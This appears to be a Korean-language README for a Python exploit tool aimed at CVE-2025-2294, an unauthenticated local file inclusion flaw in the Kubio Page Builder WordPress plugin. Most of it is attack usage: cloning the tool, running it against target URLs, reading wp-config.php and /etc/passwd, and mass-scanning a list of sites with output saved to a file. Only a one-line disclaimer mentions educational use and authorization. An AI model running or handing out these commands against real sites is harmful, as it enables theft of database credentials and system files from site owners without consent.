
Kubio Page Builder WordPress 플러그인(버전 ≤ 2.5.1)용 로컬 파일 포함(LFI) 익스플로잇입니다.
이 도구는 Kubio Page Builder 플러그인(CVE-2025-2294)의 인증되지 않은 LFI 취약점을 악용하여, 취약한 WordPress 설치 환경에서 공격자가 민감한 파일을 읽을 수 있게 합니다.
-u)-l)-o)git clone https://github.com/mrrivaldo/CVE-2025-2294.git
python3 cve-2025-2294.py -u https://vulnerable-site.com
python3 cve-2025-2294.py -u https://vulnerable-site.com -f ../../wp-config.php
python3 cve-2025-2294.py -l targets.txt -o results.txt
python3 cve-2025-2294.py --help
targets.txt:
https://wordpress-site1.com
http://wordpress-site2.com
https://another-vulnerable-site.com
이 도구는 교육 목적으로만 사용됩니다. 개발자는 어떠한 오용에 대해서도 책임을 지지 않습니다. 시스템을 테스트하기 전에 항상 적절한 승인을 받으십시오.
| 옵션 | 설명 |
|---|
-u, --url | 단일 대상 URL |
-l, --list | 대상 목록이 포함된 파일 |
-f, --file | 읽을 파일 (기본값: /etc/passwd) |
-o, --output | 취약한 대상을 파일로 저장 |